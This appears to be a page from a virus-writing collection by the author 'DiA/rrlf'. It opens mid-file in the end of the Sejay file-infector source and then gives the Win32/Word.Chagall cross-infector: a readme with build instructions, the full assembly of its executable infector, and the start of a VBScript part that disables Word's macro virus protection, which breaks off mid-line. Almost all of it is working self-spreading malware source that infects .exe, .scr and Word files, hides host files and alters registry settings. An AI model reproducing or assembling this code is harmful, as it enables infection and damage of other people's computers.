KazaaVictim,\ ;save there the path KazaaSize ;size of buffer cmp eax, 0 ;error? jne CloseRegKey ;the close the key, no infection mov esi, KazaaVictim ;to check validness GetKazaaEnd: cmp byte [esi], 0 ;end of string? je HaveKazaaEnd ;jmp to there inc esi ;next place jmp GetKazaaEnd ;go for it! HaveKazaaEnd: cmp byte [esi - 1], "\" ;check for \ je KazaaSlash ;if exist jmp to ... mov byte [esi], "\" ;make it valid mov dword [esi + 1], 0 ;zero at end KazaaSlash: invoke SetCurrentDirectory,\ ;change to kazaa folder KazaaVictim ;infect this please call InfectFolder ;DO IT! CloseRegKey: invoke RegCloseKey,\ ;close key dword [KazaaRegHandle] ;with handle ExecuteHost: mov esi, VirusFile ;make host file string GetHostFileStream: cmp byte [esi], 0 ;0 is the end of the string je AppendHostStream ;then append stream name inc esi ;address + 1 jmp GetHostFileStream ;check next byte AppendHostStream: mov edi, dword [esi - 8d] ;load a dword in edi (last 4 chars of host file name) mov byte [esi], ":" ;append a : and then the name mov dword [esi + 1d], edi ;append last dword of victims name mov dword [esi + 5d], 0 ;append the zero invoke GetCommandLine ;get commandline (maybe user did some parameters) invoke CreateProcess,\ ;run host file stream VirusFile,\ ;current file + streamname = host stream eax,\ ;commandline in eax 0,\ ;no attributes 0,\ ;... 0,\ ;no flag CREATE_NEW_CONSOLE,\ ;run new prog 0,\ ;no new enviroment block 0,\ ;no current directory StartupInfo,\ ;structure ProcessInfo ;structure cmp eax, 0 ;error starting stream? je CantRunHost ;show error msg box invoke GetSystemTime,\ ;payload action?! Systemtime ;structure cmp word [Systemtime.wMonth], 02d ;2. month of the year? jne Exit ;if not the exit cmp word [Systemtime.wDay], 03d ;03.02? jne Exit ;goodbye invoke RegOpenKeyEx,\ ;open registry key HKEY_CURRENT_USER,\ ;handle PaySubkey,\ ;open this 0,\ ;reserved KEY_SET_VALUE,\ ;set a value PayRegHandle ;save here the handle cmp eax, 0 ;error? jne PayloadMessage ;then other payload invoke lstrlen,\ ;get lenth of pay file string PayTempFile ;here inc eax ;including the zero invoke RegSetValueEx,\ ;change start page of IE dword [PayRegHandle],\ ;handle of open key PayIEStart,\ ;value name 0,\ ;reserved REG_SZ,\ ;its a string PayTempFile,\ ;this data eax ;size cmp eax, 0 ;error? jne PayloadMessage ;hmm, then use a simple msgbox invoke RegCloseKey,\ ;close it dword [PayRegHandle] ;with handle jmp Exit ;bye PayloadMessage: invoke MessageBox,\ ;show user a msgbox 0,\ ;bad luck 13 lyric PayLyric,\ ;more lines then one "You are infected with Win2k.Sejay! :: coded by DiA/rrlf (c)05",\ MB_ICONINFORMATION ;information style Exit: invoke CloseHandle,\ ;close payload file dword [PayHandle] ;with handle invoke ExitProcess,\ ;exit virus 0 NonNTFS: invoke MessageBox,\ ;no ntfs formated, cant run virus 0,\ "This application requires a NTFS formated disk.",\ ;) "ERROR 53656A6179",\ ;hex for Sejay MB_ICONERROR ;scary error jmp Exit ;dont grumble the win9x user anymore ^^ CantRunHost: invoke MessageBox,\ ;cant run host :/ 0,\ "Application execution failed.",\ "ERROR 446941",\ ;hex for DiA MB_ICONERROR jmp Exit CreatePayloadFile: invoke CreateFile,\ ;create the payload file in win dir PayTempFile,\ ;create this GENERIC_READ + GENERIC_WRITE,\ ;read n write FILE_SHARE_WRITE,\ ;to write 0,\ ;no attributes CREATE_NEW,\ ;new file FILE_ATTRIBUTE_NORMAL,\ ;normal all 0 ;no handle push eax ;save handle invoke WriteFile,\ ;write file header eax,\ ;handle PayHTMLhead,\ ;points to buffer 133d,\ ;numers of bytes to write PayBytesWritten,\ ;bytes written 0 ;no overlapped pop eax ;get handle ret ;return InfectFolder: invoke FindFirstFile,\ ;find first vicitim (*.exe) Victims,\ ;exe Win32FindData ;structure mov dword [FindHandle], eax ;save handle FindMoreFiles: cmp eax, 0 ;no more files?! je InfectDone ;restore host file name (steam) and run it invoke lstrcpy,\ ;copy victim path to appen stream name VictimStream,\ ;copy to this Win32FindData.cFileName ;from this (eax points to buffer string ..VistimStream..) GetVictimFileStream: cmp byte [eax], 0 ;get end of string je CheckVirusFile ;check if founded file is the virus file itself & append the stream name inc eax ;address + 1 jmp GetVictimFileStream ;next byte CheckVirusFile: mov ebx, VirusFile ;to jmp to the end of the string GetVirusFileEnd: cmp byte [ebx], 0 ;zero = end je CompareFiles ;copare the strings (1dowrd (xxxx)) inc ebx ;if not address + 1 jmp GetVirusFileEnd CompareFiles: mov esi, dword [ebx - 8d] ;load a dword befor extension mov edi, dword [eax - 8d] ;... cmp esi, edi ;compare je FindNextVictim ;dont belong the virus mov byte [eax], ":" ;append a : and then the name mov dword [eax + 1d], edi ;append last dword of victims name mov dword [eax + 5d], 0 ;append the zero invoke CopyFile,\ ;copy victim to temp file Win32FindData.cFileName,\ ;this to WinTempDir,\ ;temp file 0 ;copy always cmp eax, 0 ;error? je FindNextVictim ;dont infect if we cant make a temp file invoke CopyFile,\ ;check if we can copy the temp file to stream name WinTempDir,\ ;if not the file is already infected VictimStream,\ ;to this name Victim.exe:ctim 1 ;not copy always cmp eax, 0 ;error? je FindNextVictim ;then find next file invoke CopyFile,\ ;copy virus file to vivtim VirusFile,\ ;this Win32FindData.cFileName,\ ;to this 0 ;always cmp eax, 0 ;error?! je FindNextVictim ;no infection, narf invoke CopyFile,\ ;copy victim to stream WinTempDir,\ ;temp file VictimStream,\ ;this 0 ;always cmp eax, 0 ;erroreee je FindNextVictim ;more more more invoke SetFilePointer,\ ;end of payload file dword [PayHandle],\ ;handle of file 0,\ ;no distance, only end 0,\ ;brrr FILE_END ;there we go invoke WriteFile,\ ;infected html header <html><body> dword [PayHandle],\ ;file handle PayInfHeader,\ ;filename + scary message 12d,\ ;number of bytes to write PayBytesWritten,\ ;number of bytes written 0 ;no structure invoke lstrcat,\ ;append scarey infected! message Win32FindData.cFileName,\ ;append to this PayInfected ;payload message invoke lstrlen,\ ;get legth of string to write it in payload file eax ;pointer to buffer ^^^^ invoke WriteFile,\ ;write infected file to payload file dword [PayHandle],\ ;file handle Win32FindData.cFileName,\ ;filename + scary message eax,\ ;number of bytes to write PayBytesWritten,\ ;number of bytes written 0 ;no structure FindNextVictim: invoke DeleteFile,\ ;delete WinTempDir ;the temp file invoke FindNextFile,\ ;find more files to infect dword [FindHandle],\ ;handle from FindFirstFile Win32FindData ;structure jmp FindMoreFiles ;go get it! InfectDone: invoke CloseHandle,\ ;close find handle dword [FindHandle] ret ;back to call Datas: VirusFile rb 256d ;save here full path of virus file WinTempDir rb 256d ;to store temp files Victims db "*.exe",0 ;search for exe FindHandle dd ? ;save here handle to find exe files VictimStream rb 256d ;victim stream name TempFile db "Sejay.DiA",0 ;temp file FolderHandle dd ? ;handle for finding sub folders VictimFolder rb 256d ;save here folder to infect Folder db "*.*",0 ;find all (including folders) KazaaShare db "Software\Kazaa\Transfer",0 ;for kazza share folder infection KazaaRegHandle dd ? ;handle for reg key KazzaFolder db "DlDir0",0 ;value name KazaaVictim rb 255d ;save path here KazaaSize db 255d ;size of buffer StartupInfo STARTUPINFO ;structure already defined by fasm ProcessInfo PROCESS_INFORMATION ;... Win32FindData FINDDATA ;... Systemtime SYSTEMTIME ;... PayTempFile rb 256d PayFile db "Sejay.htm",0 PayHTMLhead db "<html><head><title>Win2k.Sejay</title></head><body text='#FF0000' bgcolor='#000000'><h1>YOUR COMPUTER IS INFECTED!</h1></body></html>",0 PayInfHeader db "<html><body>",0 PayInfected db " - <b>infected with Win2k.Sejay by DiA/rrlf</b><br></body></html>",0 PaySubkey db "Software\Microsoft\Internet Explorer\Main",0 PayIEStart db "Start Page",0 PayLyric db "Kings of the underground, hardest of the hardcore.",10,13 db "Bottles flyin' all around, bats are on the dance floor",10,13,10,13 db "Flames of hell surround me, blood is dripping down my face",10,13 db "The realife psychopaths, Bad luck will destroy this place.",10,13,10,13 db "...Like pussies you run.",10,13,"3 minutes, that's all, our set is done.",0 PayHandle dd ? PayBytesWritten dd ? PayRegHandle dd ? data import ;import api's library kernel32, "KERNEL32.DLL",\ user32, "USER32.DLL",\ advapi32, "ADVAPI32.DLL" import kernel32,\ GetVersion, "GetVersion",\ GetModuleFileName, "GetModuleFileNameA",\ CreateProcess, "CreateProcessA",\ FindFirstFile, "FindFirstFileA",\ FindNextFile, "FindNextFileA",\ CopyFile, "CopyFileA",\ lstrcpy, "lstrcpyA",\ DeleteFile, "DeleteFileA",\ GetCommandLine, "GetCommandLineA",\ GetWindowsDirectory, "GetWindowsDirectoryA",\ lstrcat, "lstrcatA",\ lstrlen, "lstrlenA",\ CreateFile, "CreateFileA",\ WriteFile, "WriteFile",\ SetFilePointer, "SetFilePointer",\ CloseHandle, "CloseHandle",\ GetSystemTime, "GetSystemTime",\ GetCurrentDirectory, "GetCurrentDirectoryA",\ SetCurrentDirectory, "SetCurrentDirectoryA",\ ExitProcess, "ExitProcess" import user32,\ MessageBox, "MessageBoxA" import advapi32,\ RegOpenKeyEx, "RegOpenKeyExA",\ RegSetValueEx, "RegSetValueExA",\ RegQueryValueEx, "RegQueryValueExA",\ RegCloseKey, "RegCloseKey" end data ;-----Sejay.asm-----end----------------------------------------------------------------------------------------------------

sources

Win32/Word.Chagall DiA ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;; Win32/Word.Chagall - by DiA/rrlf ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;; ====================================== ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;; DiA_hates_machine@gmx.de ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;; http://www.vx-dia.de.vu ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;; 22.05.2k5 ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Disclaimer: Attention! With this source code files you can make a living and working virus! I am NOT responsible for any damage you make with this bug! DO NEVER spread viruses or worms! It will bring trouble! This is just for education. TAKE CARE! Intro: Welcome to my first cross infector. This bug will infect executables at win32 environment and microsoft word documents. It took me a long time to finish this because i had no fun coding that vba/vbs stuff :D. But finally it's finished and i hope you have much fun with it. Description: Most cross infectors for PE/DOC i saw was nearly same thing, the word infection part was inside the exe in the data section. But i want (as always) make somethin new. So i decided to make two parts of the virus and then join it together. It works good, but need for a really good virus some more features, like encrypt the host file, encrypt the word part, just in one word encrypt the whole virus. Maybe later... Ok, now i will tell you from two situations how Chagall worx, one time from a .exe started, and other time from a .doc . Win32 Part: From a .exe or .scr started the virus will make following, step by step: - read Win32 part into memory - read Host file into memory - read Word part into memory - write host from memory to disk under name of infected file .sys - set attribute hidden to this .sys file - execute the host - infect files in current folder, windows folder and system folder - infect .exe and .scr files - keep file attributes and file time - infected file will look like this: #################### # Virus Win32 part # #################### #################### # Host file # #################### #################### # Virus Word part # #################### - check if word is running, if so dont infect Normal.dot because user will notice that somethin happends to Word - drop the Word part from memory to disk in the windows folder - make a copy of the virus in windows folder, Win32 part + Word part - execute the .vbs file, that will insert the Word part code into Normal.dot - delete this .vbs file - check for payload date, if it is 30.06. show a simple message box - exit virus Word Part: Let's say the virus comes from a .doc file into not infected system: - execute code when a document get's closed - read virus, Win32 part + Word part, from a variable inside the doc - write the virus to drive C:\ as Chag32.exe - execute this file, it will infect all .exe and .scr files, and then infect also the Nomal.dot - that makes the Word part not a typical macro virus, active infect normal, normal infect active - it is like a circle, active drop Win32 part, Win32 part infect normal and normal infect other active documents - nothin really great this Word part, no stealth, no encryption... just that it work, maybe someone want to make an advanced macro part? - please see Word part for more informations ;P Make a working Chagall: Hehe, because there are two parts it's not just like assemble and run kiddies :P. Save all in one folder, Chagall.asm, Chagall.vbs, size.equ and Joiner.asm . Then assemble Chagall.asm with FASM (www.flatassembler.org) and assemble Joiner.asm too. Now you have Chagall.exe, Chagall.vbs and Joiner.exe in one folder. run Joiner.exe and output should be ReadyChagall.exe. Attention, this is the working virus. Take care. Outro: I am proud to finish this bug, I hope you enjoy the code! Greets fly's out to all my real and cyber friends, to you the reader and to my mom, the name Chagall was her idea, it was some artist (like my mom) who makes gnaaarly pictures. For greets or fucks feel free to drop me a mail or make a guestbook entry at my page. Have a great day, and we see us in my next creation... ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;; Win32/Word.Chagall - by DiA/rrlf ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;; ====================================== ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;; DiA_hates_machine@gmx.de ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;; http://www.vx-dia.de.vu ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;; 22.05.2k5 ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;; Chagall EXE Part - Chagall.asm ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; include "%fasminc%\win32ax.inc" include "size.inc" Chagall: call LoadInMem call ExecuteHost invoke GetCurrentDirectory,\ 256d,\ CurrentDir mov ebx, CurrentDir call MakePathValid mov ebx, CurrentDir mov ecx, 10d mov edx, ExeFiles call InfectFiles mov ebx, CurrentDir mov ecx, 10d mov edx, ScrFiles call InfectFiles invoke GetWindowsDirectory,\ WindowsDir,\ 256d mov ebx, WindowsDir call MakePathValid mov ebx, WindowsDir mov ecx, 15d mov edx, ExeFiles call InfectFiles mov ebx, WindowsDir mov ecx, 15d mov edx, ScrFiles call InfectFiles invoke GetSystemDirectory,\ SystemDir,\ 256d mov ebx, SystemDir call MakePathValid mov ebx, SystemDir mov ecx, 20d mov edx, ExeFiles call InfectFiles mov ebx, SystemDir mov ecx, 20d mov edx, ScrFiles call InfectFiles call IsWordRunning cmp ecx, SomethinFalse je Exit call DropWordInfector Exit: call LoadOutMem call Payload invoke ExitProcess,\ 0 ;*****LoadInMem*****Procedure*************************** LoadInMem: ;load virus (PE/DOC) and host in memory invoke GetModuleFileName,\ 0,\ HostFileName,\ 256d mov edx, OPEN_EXISTING mov ecx, GENERIC_READ mov ebx, HostFileName call OpenFile mov dword [HostFileHandle], eax cmp ecx, SomethinFalse je LoadInMemError mov edx, VirusMemHandle mov ebx, VirusMemStart mov ecx, VirusSize call GetMem cmp ecx, SomethinFalse je LoadInMemError mov ebx, HostFileHandle mov ecx, VirusMemStart mov edx, VirusSize call ReadInMem cmp ecx, SomethinFalse je LoadInMemError invoke GetFileSize,\ dword [HostFileHandle],\ 0 sub eax, VirusSize sub eax, WordDropSize cmp eax, 0 je ReadWordDropper mov dword [HostFileSize], eax mov edx, HostMemHandle mov ebx, HostMemStart mov ecx, dword [HostFileSize] call GetMem cmp ecx, SomethinFalse je LoadInMemError mov ebx, HostFileHandle mov ecx, HostMemStart mov edx, dword [HostFileSize] call ReadInMem cmp ecx, SomethinFalse je LoadInMemError ReadWordDropper: mov edx, WordMemHandle mov ebx, WordMemStart mov ecx, WordDropSize call GetMem cmp ecx, SomethinFalse je LoadInMemError mov ebx, HostFileHandle mov ecx, WordMemStart mov edx, WordDropSize call ReadInMem cmp ecx, SomethinFalse je LoadInMemError mov ebx, HostFileHandle call CloseHand LoadInMemError: mov ecx, SomethinFalse jmp LoadInMemReturn LoadInMemEnd: mov ecx, 0 LoadInMemReturn: ret ;*****LoadInMem*****Procedure***end********************* ;*****OpenFile*****Procedure**************************** OpenFile: invoke CreateFile,\ ebx,\ ;edx - flags (CREATE_ALWAYS...OPEN_EXISTING) ecx,\ ;ebx - filename to open FILE_SHARE_READ + FILE_SHARE_WRITE,\ ;ecx - GENERIC_READ .. GENERIC_WRITE 0,\ edx,\ ;open or create? FILE_ATTRIBUTE_NORMAL,\ 0 cmp eax, INVALID_HANDLE_VALUE jne OpenFileEnd mov ecx, SomethinFalse jmp OpenFileReturn OpenFileEnd: mov ecx, 0 OpenFileReturn: ret ;*****OpenFile*****Procedure***end********************** ;*****GetMem*******Procedure**************************** GetMem: invoke GlobalAlloc,\ ;edx - pointer to handle GMEM_MOVEABLE,\ ;ebx - pointer to start address ecx ;ecx - size of memory to get mov dword [edx], eax cmp eax, 0 je GetInMemError invoke GlobalLock,\ dword [edx], mov dword [ebx], eax cmp eax, 0 jne GetInMemEnd GetInMemError: mov ecx, SomethinFalse jmp GetInMemReturn GetInMemEnd: mov ecx, 0 GetInMemReturn: ret ;*****GetMem++*****Procedure***end********************** ;*****ReadInMem*****Procedure*************************** ReadInMem: invoke ReadFile,\ ;ebx - pointer to file handle dword [ebx],\ ;ecx - pointer to start address dword [ecx],\ ;edx - size to read edx,\ BytesRead,\ 0 cmp eax, 0 jne ReadInMemEnd mov ecx, SomethinFalse jmp ReadInMemReturn ReadInMemEnd: mov ecx, 0 ReadInMemReturn: ret ;*****ReadInMem*****Procedure*************************** ;*****CloseHand*****Procedure*************************** CloseHand: invoke CloseHandle,\ ;ebx - handle to close dword [ebx] ret ;*****CloseHand*****Procedure***end********************* ;*****ExecuteHost*****Procedure************************* ExecuteHost: mov ebx, HostFileName call GetEndOfString mov dword [ebx - 3d], "sys" invoke SetFileAttributes,\ HostFileName,\ FILE_ATTRIBUTE_NORMAL mov edx, CREATE_ALWAYS mov ecx, GENERIC_WRITE mov ebx, HostFileName call OpenFile mov dword [HostFileHandle], eax cmp ecx, SomethinFalse je ExecuteHostError mov ebx, HostFileHandle mov edx, HostMemStart mov ecx, dword [HostFileSize] call WriteToFile cmp ecx, SomethinFalse je ExecuteHostError mov ebx, HostFileHandle call CloseHand invoke SetFileAttributes,\ HostFileName,\ FILE_ATTRIBUTE_HIDDEN invoke GetCommandLine mov ebx, HostFileName mov edx, eax call ExecuteThis cmp ecx, SomethinFalse jne ExecuteHostEnd ExecuteHostError: mov ecx, SomethinFalse jmp ExecuteHostReturn ExecuteHostEnd: mov ecx, 0 ExecuteHostReturn: ret ;*****ExecuteHost*****Procedure***end******************* ;*****WriteToFile*****Procedure************************* WriteToFile: invoke WriteFile,\ dword [ebx],\ ;ebx - file handle dword [edx],\ ;edx - start address of buffer ecx,\ ;ecx - size to write BytesWrite,\ 0 cmp eax, 0 jne WriteToFileEnd mov ecx, SomethinFalse jmp WriteToFileReturn WriteToFileEnd: mov ecx, 0 WriteToFileReturn: ret ;*****WriteToFile*****Procedure***end******************* ;*****ExecuteThis*****Procedure************************* ExecuteThis: invoke CreateProcess,\ ebx,\ ;ebx - pointer to file to execute edx,\ ;edx - pointer to commandline 0,\ 0,\ 0,\ CREATE_NEW_CONSOLE,\ 0,\ 0,\ Startup,\ Process cmp eax, 0 jne ExecuteThisEnd mov ecx, SomethinFalse jmp ExecuteThisReturn ExecuteThisEnd: mov ecx, 0 ExecuteThisReturn: ret ;*****ExecuteThis*****Procedure***end******************* ;*****InfectFiles*****Procedure************************* InfectFiles: mov dword [InfectCount], ecx push edx invoke SetCurrentDirectory,\ ebx ;ebx - directory to infect ;ecx - infection counter cmp eax, 0 ;edx - pointer to victim string je InfectFilesError pop edx invoke FindFirstFile,\ edx,\ Win32FindData mov dword [FindHandle], eax FindMoreFiles: cmp eax, 0 je NoMoreFiles cmp dword [InfectCount], 0 je NoMoreFiles invoke GetFileAttributes,\ Win32FindData.cFileName mov dword [VictimAttributes], eax invoke SetFileAttributes,\ Win32FindData.cFileName,\ FILE_ATTRIBUTE_NORMAL mov edx, OPEN_EXISTING mov ecx, GENERIC_READ + GENERIC_WRITE mov ebx, Win32FindData.cFileName call OpenFile mov dword [VictimHandle], eax cmp ecx, SomethinFalse je FindNextVictim invoke GetFileTime,\ dword [VictimHandle],\ Filetime,\ Filetime,\ Filetime invoke GetFileSize,\ dword [VictimHandle],\ 0 mov dword [VictimSize], eax mov edx, VictimMemHandle mov ebx, VictimMemStart mov ecx, dword [VictimSize] call GetMem cmp ecx, SomethinFalse je FindNextVictim mov ebx, VictimHandle mov ecx, VictimMemStart mov edx, dword [VictimSize] call ReadInMem cmp ecx, SomethinFalse je FindNextVictim mov ebx, dword [VictimMemStart] mov ecx, dword [VictimSize] GetInfectionMark: cmp dword [ebx], "CHAG" je FindNextVictim dec ecx cmp ecx, 0 je InfectThisFile inc ebx jmp GetInfectionMark InfectThisFile: invoke SetFilePointer,\ dword [VictimHandle],\ 0,\ 0,\ FILE_BEGIN mov ebx, VictimHandle mov edx, VirusMemStart mov ecx, VirusSize call WriteToFile cmp ecx, SomethinFalse je FindNextVictim mov ebx, VictimHandle mov edx, VictimMemStart mov ecx, dword [VictimSize] call WriteToFile cmp ecx, SomethinFalse je FindNextVictim mov ebx, VictimHandle mov edx, WordMemStart mov ecx, WordDropSize call WriteToFile FindNextVictim: invoke SetFileTime,\ dword [VictimHandle],\ Filetime,\ Filetime,\ Filetime mov ebx, VictimHandle call CloseHand invoke SetFileAttributes,\ Win32FindData.cFileName,\ dword [VictimAttributes] dec dword [InfectCount] invoke FindNextFile,\ dword [FindHandle],\ Win32FindData jmp FindMoreFiles NoMoreFiles: mov ebx, FindHandle call CloseHand mov ecx, 0 jmp InfectFilesReturn InfectFilesError: mov ecx, SomethinFalse InfectFilesReturn: ret ;*****InfectFiles*****Procedure***end******************* ;*****FreeMem*****Procedure***************************** FreeMem: invoke GlobalUnlock,\ ;ebx - handle to mem to free dword [ebx] invoke GlobalFree,\ dword [ebx] FreeMemEnd: ret ;*****FreeMem*****Procedure***end*********************** ;*****LoadOutMem*****Procedure************************** LoadOutMem: mov ebx, VirusMemHandle call FreeMem mov ebx, HostMemHandle call FreeMem mov ebx, WordMemHandle call FreeMem mov ebx, VictimMemHandle call FreeMem ret ;*****LoadOutMem*****Procedure***end********************* ;*****IsWordRunning*****Procedure************************ IsWordRunning: invoke Sleep,\ 20000 ;sleep 20 seconds, maybe word gets now closed invoke CreateToolhelp32Snapshot,\ ;check if word is running 2,\ ;if so dont infect normal.dot 0 ;because its in use mov dword [SnapHandle], eax mov dword [ProcessEntry], sizeof.PROCESSENTRY32 invoke Process32First,\ dword [SnapHandle],\ ProcessEntry FindNextProcess: cmp eax, 0 je NoWordIsRunning mov ebx, ProcessEntry.szExeFile call GetEndOfString cmp dword [ebx - 11d], "WINW" jne FindNextP cmp dword [ebx - 7d], "ORD." je WordIsRunning FindNextP: invoke Process32Next,\ dword [SnapHandle],\ ProcessEntry jmp FindNextProcess WordIsRunning: mov ecx, SomethinFalse jmp IsWordRunningReturn NoWordIsRunning: xor ecx, ecx IsWordRunningReturn: ret ;*****IsWordRunning*****Procedure***end****************** ;*****DropWordInfector*****Procedure********************* DropWordInfector: invoke GetWindowsDirectory,\ WindowsDirectory,\ 256d mov ebx, WindowsDirectory call MakePathValid invoke SetCurrentDirectory,\ WindowsDirectory cmp eax, 0 je DropWordInfectorError mov edx, CREATE_ALWAYS mov ecx, GENERIC_WRITE mov ebx, WordDropName call OpenFile mov dword [WordDropHandle], eax cmp ecx, SomethinFalse je DropWordInfectorError mov ebx, WordDropHandle mov edx, WordMemStart mov ecx, WordDropSize call WriteToFile cmp ecx, SomethinFalse je DropWordInfectorError mov ebx, WordDropHandle call CloseHand mov edx, CREATE_ALWAYS mov ecx, GENERIC_WRITE mov ebx, WordDropExe call OpenFile mov dword [WordExeHandle], eax mov ebx, WordExeHandle mov edx, VirusMemStart mov ecx, VirusSize call WriteToFile mov ebx, WordExeHandle mov edx, WordMemStart mov ecx, WordDropSize call WriteToFile mov ebx, WordExeHandle call CloseHand invoke ShellExecute,\ 0,\ WordDropExecute,\ WordDropName,\ 0,\ 0,\ SW_HIDE cmp eax, 32 jbe DropWordInfectorError invoke Sleep,\ 10000 invoke DeleteFile,\ WordDropName mov ecx, 0 jmp DropWordInfectorReturn DropWordInfectorError: mov ecx, SomethinFalse DropWordInfectorReturn: ret ;*****DropWordInfector*****Procedure***end*************** ;*****MakePathValid*****Procedure************************ MakePathValid: cmp byte [ebx], 0 ;ebx - pointer to path string je CheckValidness inc ebx jmp MakePathValid CheckValidness: cmp byte [ebx - 1], "\" je PathIsValid mov byte [ebx], "\" mov byte [ebx + 1], 0 PathIsValid: ret ;*****MakePathValid*****Procedure***end****************** ;*****GetEndOfString*****Procedure*********************** GetEndOfString: ;ebx - pointer to string cmp byte [ebx], 0 je HaveEndOfString inc ebx jmp GetEndOfString HaveEndOfString: ret ;*****GetEndOfString*****Procedure***end***************** ;*****Payload*****Procedure****************************** Payload: invoke GetSystemTime,\ SystemTime cmp word [SystemTime.wMonth], 06d jne PayloadReturn cmp word [SystemTime.wDay], 30d jne PayloadReturn invoke MessageBox,\ 0,\ PayloadCaption,\ PayloadText,\ MB_ICONWARNING PayloadReturn: ret ;*****Payload*****Procedure***end************************ Datas: HostFileName rb 256d HostFileHandle dd ? VirusMemHandle dd ? VirusMemStart dd ? BytesRead dd ? BytesWrite dd ? HostFileSize dd ? HostMemHandle dd ? HostMemStart dd ? WordMemHandle dd ? WordMemStart dd ? FindHandle dd ? VictimHandle dd ? VictimSize dd ? VictimMemHandle dd ? VictimMemStart dd ? CurrentDir rb 256d ExeFiles db "*.exe",0 ScrFiles db "*.scr",0 InfectCount dd ? VictimAttributes dd ? WindowsDirectory rb 256d WordDropName db "chagall.vbs",0 WordDropHandle dd ? WordDropExecute db "open",0 WordDropExe db "chag.wrd",0 WordExeHandle dd ? SnapHandle dd ? WindowsDir rb 256d SystemDir rb 256d PayloadCaption db "Win32/Word.Chagall Virus by DiA/rrlf",0 PayloadText db "Bad news for you: you are infected with a virus",10,13 db "Good news for me: its my birthday ;)",10,13 db "So be happy with me at this day, turn of the computer and open a beer...",10,13,10,13 db "Thanks, DiA/Ready Rangers Liberation Front",0 struct PROCESSENTRY32 .dwSize dd ? .cntUsage dd ? .th32ProcessID dd ? .th32DefaultHeapID dd ? .th32ModuleID dd ? .cntThreads dd ? .th32ParentProcessID dd ? .pcPriClassBase dd ? .dwFlags dd ? .szExeFile rb 260d ends Startup STARTUPINFO Process PROCESS_INFORMATION Win32FindData FINDDATA Filetime FILETIME ProcessEntry PROCESSENTRY32 SystemTime SYSTEMTIME data import library kernel32, "KERNEL32.DLL",\ user32, "USER32.DLL",\ shell32, "SHELL32.DLL" import kernel32,\ GetModuleFileName, "GetModuleFileNameA",\ CreateFile, "CreateFileA",\ GlobalAlloc, "GlobalAlloc",\ GlobalLock, "GlobalLock",\ ReadFile, "ReadFile",\ GetFileSize, "GetFileSize",\ CloseHandle, "CloseHandle",\ WriteFile, "WriteFile",\ CreateProcess, "CreateProcessA",\ GetCommandLine, "GetCommandLineA",\ GetCurrentDirectory, "GetCurrentDirectoryA",\ SetCurrentDirectory, "SetCurrentDirectoryA",\ FindFirstFile, "FindFirstFileA",\ FindNextFile, "FindNextFileA",\ SetFilePointer, "SetFilePointer",\ GlobalUnlock, "GlobalUnlock",\ GlobalFree, "GlobalFree",\ GetFileAttributes, "GetFileAttributesA",\ SetFileAttributes, "SetFileAttributesA",\ GetFileTime, "GetFileTime",\ SetFileTime, "SetFileTime",\ GetWindowsDirectory, "GetWindowsDirectoryA",\ GetSystemDirectory, "GetSystemDirectoryA",\ DeleteFile, "DeleteFileA",\ Sleep, "Sleep",\ CopyFile, "CopyFileA",\ CreateToolhelp32Snapshot,"CreateToolhelp32Snapshot",\ Process32First, "Process32First",\ Process32Next, "Process32Next",\ GetSystemTime, "GetSystemTime",\ ExitProcess, "ExitProcess" import user32,\ MessageBox, "MessageBoxA" import shell32,\ ShellExecute, "ShellExecuteA" end data ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;; Chagall EXE Part - Chagall.asm ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;; Chagall VBS Part - Chagall.vbs ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; On Error Resume Next Set Word = WScript.CreateObject("Word.Application") Set Shell = CreateObject("WScript.Shell") Set N = Word.NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule Word.Options.VirusProtection = False Word.Options.ConfirmConversion = False Word.Options.SaveNormalPrompt = False RegPath = "HKCU\Software\Microsoft\Office\" & Word.Application.Version & "\Word\Security\" Shell.RegWrite 